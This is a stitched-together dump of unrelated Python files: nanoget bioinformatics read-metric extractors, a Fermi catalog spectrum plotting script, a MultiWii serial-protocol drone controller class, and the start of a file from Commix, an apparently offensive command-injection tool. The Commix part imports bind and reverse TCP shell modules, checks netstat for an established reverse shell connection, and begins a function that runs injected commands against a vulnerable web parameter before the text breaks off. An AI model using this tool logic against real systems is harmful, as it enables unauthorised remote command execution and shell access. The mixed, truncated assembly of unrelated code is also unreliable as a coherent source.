logging.info("Nanoget: No index for bam file could be found, created index.")
if not samfile.header['HD']['SO'] == 'coordinate':
logging.error("Nanoget: Bam file {} not sorted by coordinate!.".format(bam))
sys.exit("Please use a bam file sorted by coordinate.")
if samtype == "bam":
logging.info("Nanoget: Bam file {} contains {} mapped and {} unmapped reads.".format(
bam, samfile.mapped, samfile.unmapped))
if samfile.mapped == 0:
logging.error("Nanoget: Bam file {} does not contain aligned reads.".format(bam))
sys.exit("FATAL: not a single read was mapped in bam file {}".format(bam))
return samfile
def process_ubam(bam, **kwargs):
"""Extracting metrics from unaligned bam format
Extracting lengths
"""
logging.info("Nanoget: Starting to collect statistics from ubam file {}.".format(bam))
samfile = pysam.AlignmentFile(bam, "rb", check_sq=False)
if not samfile.has_index():
pysam.index(bam)
# Need to reload the samfile after creating index
samfile = pysam.AlignmentFile(bam, "rb", check_sq=False)
logging.info("Nanoget: No index for bam file could be found, created index.")
datadf = pd.DataFrame(
data=[(read.query_name, ut.ave_qual(read.query_qualities), read.query_length)
for read in samfile.fetch(until_eof=True)],
columns=["readIDs", "quals", "lengths"]) \
.dropna(axis='columns', how='all') \
.dropna(axis='index', how='any')
logging.info("Nanoget: ubam {} contains {} reads.".format(
bam, datadf["lengths"].size))
return ut.reduce_memory_usage(datadf)
def process_bam(bam, **kwargs):
"""Combines metrics from bam after extraction.
Processing function: calls pool of worker functions
to extract from a bam file the following metrics:
-lengths
-aligned lengths
-qualities
-aligned qualities
-mapping qualities
-edit distances to the reference genome scaled by read length
Returned in a pandas DataFrame
"""
logging.info("Nanoget: Starting to collect statistics from bam file {}.".format(bam))
samfile = check_bam(bam)
chromosomes = samfile.references
if len(chromosomes) > 100 or kwargs["huge"]:
logging.info("Nanoget: lots of contigs (>100) or --huge, not running in separate processes")
datadf = pd.DataFrame(
data=extract_from_bam(bam, None, kwargs["keep_supp"]),
columns=["readIDs", "quals", "aligned_quals", "lengths",
"aligned_lengths", "mapQ", "percentIdentity"]) \
.dropna(axis='columns', how='all') \
.dropna(axis='index', how='any')
else:
unit = chromosomes
with cfutures.ProcessPoolExecutor(max_workers=kwargs["threads"]) as executor:
datadf = pd.DataFrame(
data=[res for sublist in executor.map(extract_from_bam,
repeat(bam),
unit,
repeat(kwargs["keep_supp"]))
for res in sublist],
columns=["readIDs", "quals", "aligned_quals", "lengths",
"aligned_lengths", "mapQ", "percentIdentity"]) \
.dropna(axis='columns', how='all') \
.dropna(axis='index', how='any')
logging.info(f"Nanoget: bam {bam} contains {datadf['lengths'].size} primary alignments.")
return ut.reduce_memory_usage(datadf)
def process_cram(cram, **kwargs):
"""Combines metrics from cram after extraction.
Processing function: calls pool of worker functions
to extract from a cram file the following metrics:
-lengths
-aligned lengths
-qualities
-aligned qualities
-mapping qualities
-edit distances to the reference genome scaled by read length
Returned in a pandas DataFrame
"""
logging.info("Nanoget: Starting to collect statistics from cram file {}.".format(cram))
samfile = check_bam(cram, samtype="cram")
chromosomes = samfile.references
if len(chromosomes) > 100:
unit = [None]
logging.info("Nanoget: lots of contigs (>100), not running in separate processes")
else:
unit = chromosomes
with cfutures.ProcessPoolExecutor(max_workers=kwargs["threads"]) as executor:
datadf = pd.DataFrame(
data=[res for sublist in executor.map(extract_from_bam,
repeat(cram), unit, repeat(kwargs["keep_supp"]))
for res in sublist],
columns=["readIDs", "quals", "aligned_quals", "lengths",
"aligned_lengths", "mapQ", "percentIdentity"]) \
.dropna(axis='columns', how='all') \
.dropna(axis='index', how='any')
logging.info(f"Nanoget: cram {cram} contains {datadf['lengths'].size} primary alignments.")
return ut.reduce_memory_usage(datadf)
def extract_from_bam(bam, chromosome, keep_supplementary=True):
"""Extracts metrics from bam.
Worker function per chromosome
loop over a bam file and create list with tuples containing metrics:
-qualities
-aligned qualities
-lengths
-aligned lengths
-mapping qualities
-edit distances to the reference genome scaled by read length
"""
samfile = pysam.AlignmentFile(bam, "rb")
if keep_supplementary:
return [
(read.query_name,
ut.ave_qual(read.query_qualities),
ut.ave_qual(read.query_alignment_qualities),
read.query_length,
read.query_alignment_length,
read.mapping_quality,
get_pID(read))
for read in samfile.fetch(reference=chromosome, multiple_iterators=True)
if not read.is_secondary and not read.is_unmapped]
else:
return [
(read.query_name,
ut.ave_qual(read.query_qualities),
ut.ave_qual(read.query_alignment_qualities),
read.query_length,
read.query_alignment_length,
read.mapping_quality,
get_pID(read))
for read in samfile.fetch(reference=chromosome, multiple_iterators=True)
if not read.is_secondary and not read.is_unmapped and not read.is_supplementary]
def get_pID(read):
"""Return the percent identity of a read.
based on the NM tag if present,
if not calculate from MD tag and CIGAR string
read.query_alignment_length can be zero in the case of ultra long reads aligned with minimap2 -L
"""
match = reduce(lambda x, y: x + y[1] if y[0] in (0, 7, 8) else x, read.cigartuples, 0)
ins = reduce(lambda x, y: x + y[1] if y[0] == 1 else x, read.cigartuples, 0)
delt = reduce(lambda x, y: x + y[1] if y[0] == 2 else x, read.cigartuples, 0)
alignment_length = match + ins + delt
try:
return (1 - read.get_tag("NM") / alignment_length) * 100
except KeyError:
try:
return 100 * (1 - (parse_MD(read.get_tag("MD")) + parse_CIGAR(read.cigartuples)) /
alignment_length)
except KeyError:
return None
except ZeroDivisionError:
return None
def parse_MD(MDlist):
"""Parse MD string to get number of mismatches and deletions."""
return sum([len(item) for item in re.split('[0-9^]', MDlist)])
def parse_CIGAR(cigartuples):
"""Count the insertions in the read using the CIGAR string."""
return sum([item[1] for item in cigartuples if item[0] == 1])
def handle_compressed_input(inputfq, file_type="fastq"):
"""Return handles from compressed files according to extension.
Check for which fastq input is presented and open a handle accordingly
Can read from compressed files (gz, bz2, bgz) or uncompressed
Relies on file extensions to recognize compression
"""
ut.check_existance(inputfq)
if inputfq.endswith(('.gz', 'bgz')):
import gzip
logging.info("Nanoget: Decompressing gzipped {} {}".format(file_type, inputfq))
return gzip.open(inputfq, 'rt')
elif inputfq.endswith('.bz2'):
import bz2
logging.info("Nanoget: Decompressing bz2 compressed {} {}".format(file_type, inputfq))
return bz2.open(inputfq, 'rt')
elif inputfq.endswith(('.fastq', '.fq', 'fasta', '.fa', '.fas')):
return open(inputfq, 'r')
else:
logging.error("INPUT ERROR: Unrecognized file extension {}".format(inputfq))
sys.exit('INPUT ERROR:\nUnrecognized file extension in {}\n'
'Supported are gz, bz2, bgz, fastq, fq, fasta, fa and fas'.format(inputfq))
def process_fasta(fasta, **kwargs):
"""Combine metrics extracted from a fasta file."""
logging.info("Nanoget: Starting to collect statistics from a fasta file.")
inputfasta = handle_compressed_input(fasta, file_type="fasta")
return ut.reduce_memory_usage(pd.DataFrame(
data=[len(rec) for rec in SeqIO.parse(inputfasta, "fasta")],
columns=["lengths"]
).dropna())
def process_fastq_plain(fastq, **kwargs):
"""Combine metrics extracted from a fastq file."""
logging.info("Nanoget: Starting to collect statistics from plain fastq file.")
inputfastq = handle_compressed_input(fastq)
return ut.reduce_memory_usage(pd.DataFrame(
data=[res for res in extract_from_fastq(inputfastq) if res],
columns=["quals", "lengths"]
).dropna())
def extract_from_fastq(fq):
"""Extract metrics from a fastq file.
Return average quality and read length
"""
for rec in SeqIO.parse(fq, "fastq"):
yield ut.ave_qual(rec.letter_annotations["phred_quality"]), len(rec)
def stream_fastq_full(fastq, threads):
"""Generator for returning metrics extracted from fastq.
Extract from a fastq file:
-readname
-average and median quality
-read_lenght
"""
logging.info("Nanoget: Starting to collect full metrics from plain fastq file.")
inputfastq = handle_compressed_input(fastq)
with cfutures.ProcessPoolExecutor(max_workers=threads) as executor:
for results in executor.map(extract_all_from_fastq, SeqIO.parse(inputfastq, "fastq")):
yield results
logging.info("Nanoget: Finished collecting statistics from plain fastq file.")
def extract_all_from_fastq(rec):
"""Extract metrics from a fastq file.
Return identifier, read length, average quality and median quality
"""
return (rec.id,
len(rec),
ut.ave_qual(rec.letter_annotations["phred_quality"]),
None)
def info_to_dict(info):
"""Get the key-value pairs from the albacore/minknow fastq description and return dict"""
return {field.split('=')[0]: field.split('=')[1] for field in info.split(' ')[1:]}
def process_fastq_rich(fastq, **kwargs):
"""Extract metrics from a richer fastq file.
Extract information from fastq files generated by albacore or MinKNOW,
containing richer information in the header (key-value pairs)
read=<int> [72]
ch=<int> [159]
start_time=<timestamp> [2016-07-15T14:23:22Z] # UTC ISO 8601 ISO 3339 timestamp
Z indicates UTC time, T is the delimiter between date expression and time expression
dateutil.parser.parse("2016-07-15T14:23:22Z") imported as dparse
-> datetime.datetime(2016, 7, 15, 14, 23, 22, tzinfo=tzutc())
"""
logging.info("Nanoget: Starting to collect statistics from rich fastq file.")
inputfastq = handle_compressed_input(fastq)
res = []
for record in SeqIO.parse(inputfastq, "fastq"):
try:
read_info = info_to_dict(record.description)
res.append(
(ut.ave_qual(record.letter_annotations["phred_quality"]),
len(record),
read_info["ch"],
read_info["start_time"],
read_info["runid"]))
except KeyError:
logging.error("Nanoget: keyerror when processing record {}".format(record.description))
sys.exit("Unexpected fastq identifier:\n{}\n\n \
missing one or more of expected fields 'ch', 'start_time' or 'runid'".format(
record.description))
df = pd.DataFrame(
data=res,
columns=["quals", "lengths", "channelIDs", "timestamp", "runIDs"]).dropna()
df["channelIDs"] = df["channelIDs"].astype("int64")
return ut.reduce_memory_usage(df)
def readfq(fp):
"""Generator function adapted from https://github.com/lh3/readfq."""
last = None # this is a buffer keeping the last unprocessed line
while True: # mimic closure; is it a bad idea?
if not last: # the first record or a record following a fastq
for l in fp: # search for the start of the next record
if l[0] in '>@': # fasta/q header line
last = l[:-1] # save this line
break
if not last:
break
name, seqs, last = last[1:].partition(" ")[0], [], None
for l in fp: # read the sequence
if l[0] in '@+>':
last = l[:-1]
break
seqs.append(l[:-1])
if not last or last[0] != '+': # this is a fasta record
yield name, ''.join(seqs), None # yield a fasta record
if not last:
break
else: # this is a fastq record
seq, leng, seqs = ''.join(seqs), 0, []
for l in fp: # read the quality
seqs.append(l[:-1])
leng += len(l) - 1
if leng >= len(seq): # have read enough quality
last = None
yield name, seq, ''.join(seqs) # yield a fastq record
break
if last: # reach EOF before reading enough quality
yield name, seq, None # yield a fasta record instead
break
def fq_minimal(fq):
"""Minimal fastq metrics extractor.
Quickly parse a fasta/fastq file - but makes expectations on the file format
There will be dragons if unexpected format is used
Expects a fastq_rich format, but extracts only timestamp and length
"""
try:
while True:
time = next(fq)[1:].split(" ")[4][11:-1]
length = len(next(fq))
next(fq)
next(fq)
yield time, length
except StopIteration:
yield None
def process_fastq_minimal(fastq, **kwargs):
"""Swiftly extract minimal features (length and timestamp) from a rich fastq file"""
infastq = handle_compressed_input(fastq)
try:
df = pd.DataFrame(
data=[rec for rec in fq_minimal(infastq) if rec],
columns=["timestamp", "lengths"]
)
except IndexError:
logging.error("Fatal: Incorrect file structure for fastq_minimal")
sys.exit("Error: file does not match expected structure for fastq_minimal")
return ut.reduce_memory_usage(df)
|
import numpy
from Plot.PlotLibrary import *
from Catalog.ReadFermiCatalog import *
from environ import FERMI_CATALOG_DIR
source = "2FGL J1015.1+4925"
Cat = FermiCatalogReader(source,FERMI_CATALOG_DIR,"e2dnde","TeV")
print "2FGL association ",Cat.Association('3FGL')
print "3FGL Name ",Cat.Association('2FHL','3FGL_name')
print "3FGL Var Index ",Cat.GetVarIndex("3FGL")
Cat.MakeSpectrum("3FGL",1e-4,0.3)
enerbut,but,enerphi,phi = Cat.Plot("3FGL")
Cat.MakeSpectrum("2FGL",1e-4,0.3)
enerbut2FGL,but2FGL,enerphi2FGL,phi2FGL = Cat.Plot("2FGL")
Cat.MakeSpectrum("2FHL",5e-2,2)
enerbut2FHL,but2FHL,enerphi2FHL,phi2FHL = Cat.Plot("2FHL")
em,ep,flux,dflux = Cat.GetDataPoints('3FGL') #energy in TeV since the user ask for that in the call of Cat
ener = numpy.sqrt(em*ep)
dem = ener-em
dep = ep-ener
c=Cat.ReadPL('3FGL')[3]
dnde = (-c+1)*flux*numpy.power(ener*1e6,-c+2)/(numpy.power((ep*1e6),-c+1)-numpy.power((em*1e6),-c+1))*1.6e-6
ddnde = dnde*dflux/flux
import matplotlib.pyplot as plt
plt.loglog()
plt.plot(enerbut, but, 'b-',label = "3FGL")
plt.plot(enerphi,phi, 'b-')
plt.plot(enerbut2FGL,but2FGL,'g-',label = "2FGL")
plt.plot(enerphi2FGL,phi2FGL,'g-')
plt.plot(enerbut2FHL,but2FHL,'r-',label = "2FHL")
plt.plot(enerphi2FHL,phi2FHL,'r-')
plt.errorbar(ener, dnde, xerr= [dem,dep], yerr = ddnde,fmt='o')
plt.legend(loc = 3)
plt.ylabel('E2dN/dE(erg.cm-2.s-1)')
plt.xlabel('energy (TeV)')
plt.show()
|
"""
author: Alex Apostoli
based on https://github.com/hkm95/python-multiwii
which is under GPLv3
"""
import struct
import time
import sys
import re
class MSPItem:
def __init__(self, name, fmt, fields):
self.name = name
self.format = fmt
self.fields = fields
if not isinstance(self.format, list):
self.format = [self.format]
self.fields = [self.fields]
self.values = {}
def parse(self, msp, dataSize):
'''parse data'''
ofs = msp.p
for i in range(len(self.format)):
fmt = self.format[i]
fields = self.fields[i].split(',')
if fmt[0] == '{':
# we have a repeat count from an earlier variable
right = fmt.find('}')
vname = fmt[1:right]
count = self.values[vname]
fmt = "%u%s" % (count, fmt[right+1:])
if fmt[0].isdigit():
repeat = int(re.search(r'\d+', fmt).group())
else:
repeat = None
fmt = "<" + fmt
fmt_size = struct.calcsize(fmt)
if dataSize < fmt_size:
raise Exception("Format %s needs %u bytes got %u for %s" % (self.name, fmt_size, dataSize, fmt))
values = list(struct.unpack(fmt, msp.inBuf[ofs:ofs+fmt_size]))
if repeat is not None:
for i in range(len(fields)):
self.values[fields[i]] = []
for j in range(repeat):
self.values[fields[i]].append(values[j*len(fields)])
else:
for i in range(len(fields)):
self.values[fields[i]] = values[i]
dataSize -= fmt_size
ofs += fmt_size
msp.by_name[self.name] = self
#print("Got %s" % self.name)
class PyMSP:
""" Multiwii Serial Protocol """
OSD_RSSI_VALUE = 0
OSD_MAIN_BATT_VOLTAGE = 1
OSD_CROSSHAIRS = 2
OSD_ARTIFICIAL_HORIZON = 3
OSD_HORIZON_SIDEBARS = 4
OSD_ITEM_TIMER_1 = 5
OSD_ITEM_TIMER_2 = 6
OSD_FLYMODE = 7
OSD_CRAFT_NAME = 8
OSD_THROTTLE_POS = 9
OSD_VTX_CHANNEL = 10
OSD_CURRENT_DRAW = 11
OSD_MAH_DRAWN = 12
OSD_GPS_SPEED = 13
OSD_GPS_SATS = 14
OSD_ALTITUDE = 15
OSD_ROLL_PIDS = 16
OSD_PITCH_PIDS = 17
OSD_YAW_PIDS = 18
OSD_POWER = 19
OSD_PIDRATE_PROFILE = 20
OSD_WARNINGS = 21
OSD_AVG_CELL_VOLTAGE = 22
OSD_GPS_LON = 23
OSD_GPS_LAT = 24
OSD_DEBUG = 25
OSD_PITCH_ANGLE = 26
OSD_ROLL_ANGLE = 27
OSD_MAIN_BATT_USAGE = 28
OSD_DISARMED = 29
OSD_HOME_DIR = 30
OSD_HOME_DIST = 31
OSD_NUMERICAL_HEADING = 32
OSD_NUMERICAL_VARIO = 33
OSD_COMPASS_BAR = 34
OSD_ESC_TMP = 35
OSD_ESC_RPM = 36
OSD_REMAINING_TIME_ESTIMATE = 37
OSD_RTC_DATETIME = 38
OSD_ADJUSTMENT_RANGE = 39
OSD_CORE_TEMPERATURE = 40
OSD_ANTI_GRAVITY = 41
OSD_G_FORCE = 42
OSD_MOTOR_DIAG = 43
OSD_LOG_STATUS = 44
OSD_FLIP_ARROW = 45
OSD_LINK_QUALITY = 46
OSD_FLIGHT_DIST = 47
OSD_STICK_OVERLAY_LEFT = 48
OSD_STICK_OVERLAY_RIGHT = 49
OSD_DISPLAY_NAME = 50
OSD_ESC_RPM_FREQ = 51
OSD_RATE_PROFILE_NAME = 52
OSD_PID_PROFILE_NAME = 53
OSD_PROFILE_NAME = 54
OSD_RSSI_DBM_VALUE = 55
OSD_RC_CHANNELS = 56
OSD_CAMERA_FRAME = 57
MSP_NAME =10
MSP_OSD_CONFIG =84
MSP_IDENT =100
MSP_STATUS =101
MSP_RAW_IMU =102
MSP_SERVO =103
MSP_MOTOR =104
MSP_RC =105
MSP_RAW_GPS =106
MSP_COMP_GPS =107
MSP_ATTITUDE =108
MSP_ALTITUDE =109
MSP_ANALOG =110
MSP_RC_TUNING =111
MSP_PID =112
MSP_BOX =113
MSP_MISC =114
MSP_MOTOR_PINS =115
MSP_BOXNAMES =116
MSP_PIDNAMES =117
MSP_WP =118
MSP_BOXIDS =119
MSP_SERVO_CONF =120
MSP_NAV_STATUS =121
MSP_NAV_CONFIG =122
MSP_MOTOR_3D_CONFIG =124
MSP_RC_DEADBAND =125
MSP_SENSOR_ALIGNMENT =126
MSP_LED_STRIP_MODECOLOR =127
MSP_VOLTAGE_METERS =128
MSP_CURRENT_METERS =129
MSP_BATTERY_STATE =130
MSP_MOTOR_CONFIG =131
MSP_GPS_CONFIG =132
MSP_COMPASS_CONFIG =133
MSP_ESC_SENSOR_DATA =134
MSP_GPS_RESCUE =135
MSP_GPS_RESCUE_PIDS =136
MSP_VTXTABLE_BAND =137
MSP_VTXTABLE_POWERLEVEL =138
MSP_MOTOR_TELEMETRY =139
MSP_SET_RAW_RC =200
MSP_SET_RAW_GPS =201
MSP_SET_PID =202
MSP_SET_BOX =203
MSP_SET_RC_TUNING =204
MSP_ACC_CALIBRATION =205
MSP_MAG_CALIBRATION =206
MSP_SET_MISC =207
MSP_RESET_CONF =208
MSP_SET_WP =209
MSP_SELECT_SETTING =210
MSP_SET_HEAD =211
MSP_SET_SERVO_CONF =212
MSP_SET_MOTOR =214
MSP_SET_NAV_CONFIG =215
MSP_SET_MOTOR_3D_CONFIG =217
MSP_SET_RC_DEADBAND =218
MSP_SET_RESET_CURR_PID =219
MSP_SET_SENSOR_ALIGNMENT =220
MSP_SET_LED_STRIP_MODECOLOR=221
MSP_SET_MOTOR_CONFIG =222
MSP_SET_GPS_CONFIG =223
MSP_SET_COMPASS_CONFIG =224
MSP_SET_GPS_RESCUE =225
MSP_SET_GPS_RESCUE_PIDS =226
MSP_SET_VTXTABLE_BAND =227
MSP_SET_VTXTABLE_POWERLEVEL=228
MSP_BIND =241
MSP_RTC =247
MSP_EEPROM_WRITE =250
MSP_DEBUGMSG =253
MSP_DEBUG =254
IDLE = 0
HEADER_START = 1
HEADER_M = 2
HEADER_ARROW = 3
HEADER_SIZE = 4
HEADER_CMD = 5
HEADER_ERR = 6
PIDITEMS = 10
MESSAGES = {
MSP_RAW_GPS: MSPItem('RAW_GPS', "BBiihH", "fix,numSat,Lat,Lon,Alt,Speed"),
MSP_IDENT: MSPItem('IDENT', "BBBI", "version,multiType,MSPVersion,multiCapability"),
MSP_STATUS: MSPItem('STATUS', "HHHI", "cycleTime,i2cError,present,mode"),
MSP_RAW_IMU: MSPItem('RAW_IMU', "hhhhhhhhh", "AccX,AccY,AccZ,GyrX,GyrY,GyrZ,MagX,MagY,MagZ"),
MSP_SERVO: MSPItem('SERVO', "8h", "servo"),
MSP_MOTOR: MSPItem('MOTOR', "8h", "motor"),
MSP_RC: MSPItem('RC', "8h", "rc"),
MSP_COMP_GPS: MSPItem('COMP_GPS', "HhB", "distanceToHome,directionToHome,update"),
MSP_ATTITUDE: MSPItem('ATTITUDE', "hhh", "roll,pitch,yaw"),
MSP_ALTITUDE: MSPItem('ALTITUDE', "ih", "alt,vspeed"),
MSP_RC_TUNING: MSPItem('RC_TUNING', "BBBBBBB", "RC_Rate,RC_Expo,RollPitchRate,YawRate,DynThrPID,ThrottleMID,ThrottleExpo"),
MSP_BATTERY_STATE: MSPItem('BATTERY_STATE', "BHBHh", "cellCount,capacity,voltage,mah,current"),
MSP_RTC: MSPItem('RTC', "HBBBBBH", "year,mon,mday,hour,min,sec,millis"),
MSP_OSD_CONFIG: MSPItem("OSD_CONFIG",
["BBBBHBBH",
"{osd_item_count}H",
"B", "{stats_item_count}H",
"B", "{timer_count}H",
"HBIBBB"],
["feature,video_system,units,rssi_alarm,cap_alarm,unused1,osd_item_count,alt_alarm",
"osd_items",
"stats_item_count", "stats_items",
"timer_count", "timer_items",
"legacy_warnings,warnings_count,enabled_warnings,profiles,selected_profile,osd_overlay"]),
MSP_PID: MSPItem("PID", "8PID", "P,I,D"),
MSP_MISC: MSPItem("MISC", "HHHHHII","intPowerTrigger,conf1,conf2,conf3,conf4,conf5,conf6"),
MSP_MOTOR_PINS: MSPItem("MOTOR_PINS", "8H","MP"),
MSP_ANALOG: MSPItem("ANALOG", "BHHHH", "dV,consumed_mah,rssi,current,volt"),
MSP_STATUS: MSPItem("STATUS", "HHHIBHHBBIB", "task_delta,i2c_err_count,sensor_status,mode_flags,nop_1,system_load,gyro_time,nop_2,nop_3,armed,extra"),
}
def __init__(self):
self.msp_name = {
'name':None
}
self.msp_osd_config = {}
self.inBuf = bytearray([0] * 255)
self.p = 0
self.c_state = self.IDLE
self.err_rcvd = False
self.checksum = 0
self.cmd = 0
self.offset=0
self.dataSize=0
self.servo = []
self.mot = []
self.RCChan = []
self.byteP = []
self.byteI = []
self.byteD = []
self.confINF = []
self.byteMP = []
self.confP = []
self.confI = []
self.confD = []
# parsed messages, indexed by name
self.by_name = {}
def get(self, fieldname):
'''get a field from a parsed message by Message.Field name'''
a = fieldname.split('.')
msgName = a[0]
fieldName = a[1]
if not msgName in self.by_name:
# default to zero for simplicty of display
return 0
msg = self.by_name[msgName]
if not fieldName in msg.values:
raise Exception("Unknown field %s" % fieldName)
return msg.values[fieldName]
def read32(self):
'''signed 32 bit number'''
value, = struct.unpack("<i", self.inBuf[self.p:self.p+4])
self.p += 4
return value
def read32u(self):
'''unsigned 32 bit number'''
value, = struct.unpack("<I", self.inBuf[self.p:self.p+4])
self.p += 4
return value
def read16(self):
'''signed 16 bit number'''
value, = struct.unpack("<h", self.inBuf[self.p:self.p+2])
self.p += 2
return value
def read16u(self):
'''unsigned 16 bit number'''
value, = struct.unpack("<H", self.inBuf[self.p:self.p+2])
self.p += 2
return value
def read8(self):
'''unsigned 8 bit number'''
value, = struct.unpack("<B", self.inBuf[self.p:self.p+1])
self.p += 1
return value
def requestMSP (self, msp, payload = [], payloadinbytes = False):
if msp < 0:
return 0
checksum = 0
bf = ['$', 'M', '<']
pl_size = 2 * ((len(payload)) & 0xFF)
bf.append(pl_size)
checksum ^= (pl_size&0xFF)
bf.append(msp&0xFF)
checksum ^= (msp&0xFF)
if payload > 0:
if (payloadinbytes == False):
for c in struct.pack('<%dh' % ((pl_size) / 2), *payload):
checksum ^= (ord(c) & 0xFF)
else:
for c in struct.pack('<%Bh' % ((pl_size) / 2), *payload):
checksum ^= (ord(c) & 0xFF)
bf = bf + payload
bf.append(checksum)
return bf
def evaluateCommand(self, cmd, dataSize):
if cmd in self.MESSAGES:
# most messages are parsed from the MESSAGES list
self.MESSAGES[cmd].parse(self, dataSize)
elif cmd == self.MSP_NAME:
s = bytearray()
for i in range(0,dataSize,1):
b = self.read8()
if b == 0:
break
s.append(b)
self.msp_name['name'] = s.decode("utf-8")
elif cmd == self.MSP_ACC_CALIBRATION:
x = None
elif cmd == self.MSP_MAG_CALIBRATION:
x = None
elif cmd == self.MSP_BOX:
x = None
elif cmd == self.MSP_BOXNAMES:
x = None
elif cmd == self.MSP_PIDNAMES:
x = None
elif cmd == self.MSP_SERVO_CONF:
x = None
elif cmd == self.MSP_DEBUGMSG:
x = None
elif cmd == self.MSP_DEBUG:
x = None
else:
print("Unhandled command ", cmd, dataSize)
def parseMspData(self, buf):
for c in buf:
self.parseMspByte(c)
def parseMspByte(self, c):
if sys.version_info.major >= 3:
cc = chr(c)
ci = c
else:
cc = c
ci = ord(c)
if self.c_state == self.IDLE:
if cc == '$':
self.c_state = self.HEADER_START
else:
self.c_state = self.IDLE
elif self.c_state == self.HEADER_START:
if cc == 'M':
self.c_state = self.HEADER_M
else:
self.c_state = self.IDLE
elif self.c_state == self.HEADER_M:
if cc == '>':
self.c_state = self.HEADER_ARROW
elif cc == '!':
self.c_state = self.HEADER_ERR
else:
self.c_state = self.IDLE
elif self.c_state == self.HEADER_ARROW or self.c_state == self.HEADER_ERR:
self.err_rcvd = (self.c_state == self.HEADER_ERR)
#print (struct.unpack('<B',c)[0])
self.dataSize = ci
# reset index variables
self.p = 0
self.offset = 0
self.checksum = 0
self.checksum ^= ci
# the command is to follow
self.c_state = self.HEADER_SIZE
elif self.c_state == self.HEADER_SIZE:
#print (struct.unpack('<B',c)[0])
self.cmd = ci
self.checksum ^= ci
self.c_state = self.HEADER_CMD
elif self.c_state == self.HEADER_CMD and self.offset < self.dataSize:
#print (struct.unpack('<B',c)[0])
self.checksum ^= ci
self.inBuf[self.offset] = ci
self.offset += 1
elif self.c_state == self.HEADER_CMD and self.offset >= self.dataSize:
# compare calculated and transferred checksum
if ((self.checksum&0xFF) == ci):
if self.err_rcvd:
print("Vehicle didn't understand the request type")
else:
self.evaluateCommand(self.cmd, self.dataSize)
else:
print('"invalid checksum for command "+((int)(cmd&0xFF))+": "+(checksum&0xFF)+" expected, got "+(int)(c&0xFF))')
self.c_state = self.IDLE
def setPID(self):
self.sendRequestMSP(self.requestMSP(self.MSP_PID))
self.receiveData(self.MSP_PID)
time.sleep(0.04)
payload = []
for i in range(0, self.PIDITEMS, 1):
self.byteP[i] = int((round(self.confP[i] * 10)))
self.byteI[i] = int((round(self.confI[i] * 1000)))
self.byteD[i] = int((round(self.confD[i])))
# POS - 4 POSR - 5 NAVR - 6
self.byteP[4] = int((round(self.confP[4] * 100.0)))
self.byteI[4] = int((round(self.confI[4] * 100.0)))
self.byteP[5] = int((round(self.confP[5] * 10.0)))
self.byteI[5] = int((round(self.confI[5] * 100.0)))
self.byteD[5] = int((round(self.confD[5] * 10000.0))) / 10
self.byteP[6] = int((round(self.confP[6] * 10.0)))
self.byteI[6] = int((round(self.confI[6] * 100.0)))
self.byteD[6] = int((round(self.confD[6] * 10000.0))) / 10
for i in range(0, self.PIDITEMS, 1):
payload.append(self.byteP[i])
payload.append(self.byteI[i])
payload.append(self.byteD[i])
self.sendRequestMSP(self.requestMSP(self.MSP_SET_PID, payload, True), True)
def arm(self):
timer = 0
start = time.time()
while timer < 0.5:
data = [1500,1500,2000,1000]
self.sendRequestMSP(self.requestMSP(self.MSP_SET_RAW_RC,data))
time.sleep(0.05)
timer = timer + (time.time() - start)
start = time.time()
def disarm(self):
timer = 0
start = time.time()
while timer < 0.5:
data = [1500,1500,1000,1000]
self.sendRequestMSP(self.requestMSP(self.MSP_SET_RAW_RC,data))
time.sleep(0.05)
timer = timer + (time.time() - start)
start = time.time()
def receiveIMU(self, duration):
timer = 0
start = time.time()
while timer < duration:
self.sendRequestMSP(self.requestMSP(self.MSP_RAW_IMU))
self.receiveData(self.MSP_RAW_IMU)
if self.msp_raw_imu['accx'] > 32768: # 2^15 ...to check if negative number is received
self.msp_raw_imu['accx'] -= 65536 # 2^16 ...converting into 2's complement
if self.msp_raw_imu['accy'] > 32768:
self.msp_raw_imu['accy'] -= 65536
if self.msp_raw_imu['accz'] > 32768:
self.msp_raw_imu['accz'] -= 65536
if self.msp_raw_imu['gyrx'] > 32768:
self.msp_raw_imu['gyrx'] -= 65536
if self.msp_raw_imu['gyry'] > 32768:
self.msp_raw_imu['gyry'] -= 65536
if self.msp_raw_imu['gyrz'] > 32768:
self.msp_raw_imu['gyrz'] -= 65536
print("size: %d, accx: %f, accy: %f, accz: %f, gyrx: %f, gyry: %f, gyrz: %f " %(self.msp_raw_imu['size'], self.msp_raw_imu['accx'], self.msp_raw_imu['accy'], self.msp_raw_imu['accz'], self.msp_raw_imu['gyrx'], self.msp_raw_imu['gyry'], self.msp_raw_imu['gyrz']))
time.sleep(0.04)
timer = timer + (time.time() - start)
start = time.time()
def calibrateIMU(self):
self.sendRequestMSP(self.requestMSP(self.MSP_ACC_CALIBRATION))
time.sleep(0.01)
|
"""
This file is part of Commix Project (http://commixproject.com).
Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst).
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
For more see the file 'readme/COPYING' for copying permission.
"""
import re
import os
import sys
import time
import urllib
import urlparse
from src.utils import menu
from src.utils import settings
from src.core.injections.controller import checks
from src.thirdparty.colorama import Fore, Back, Style, init
from src.core.shells import bind_tcp
from src.core.shells import reverse_tcp
from src.core.injections.results_based.techniques.classic import cb_injector
from src.core.injections.results_based.techniques.eval_based import eb_injector
from src.core.injections.semiblind.techniques.file_based import fb_injector
"""
Check for established connection
"""
def check_established_connection():
while True:
if settings.VERBOSITY_LEVEL == 1:
print ""
warn_msg = "Something went wrong with the reverse TCP connection."
warn_msg += " Please wait while checking state."
print settings.print_warning_msg(warn_msg)
time.sleep(10)
lines = os.popen('netstat -anta').read().split("\n")
found = False
for line in lines:
if "ESTABLISHED" in line and settings.LPORT in line.split():
found = True
pass
if not found:
return
"""
Execute the bind / reverse TCP shell
"""
def execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, payload, OUTPUT_TEXTFILE):
if settings.EVAL_BASED_STATE != False:
# Command execution results.
start = time.time()
response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
end = time.time()
diff = end - start
# Evaluate injection results.
shell = eb_injector.injection_results(response, TAG, cmd)
else:
# Command execution results.
start = time.time()
if settings.FILE_BASED_STATE == True:
response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
else:
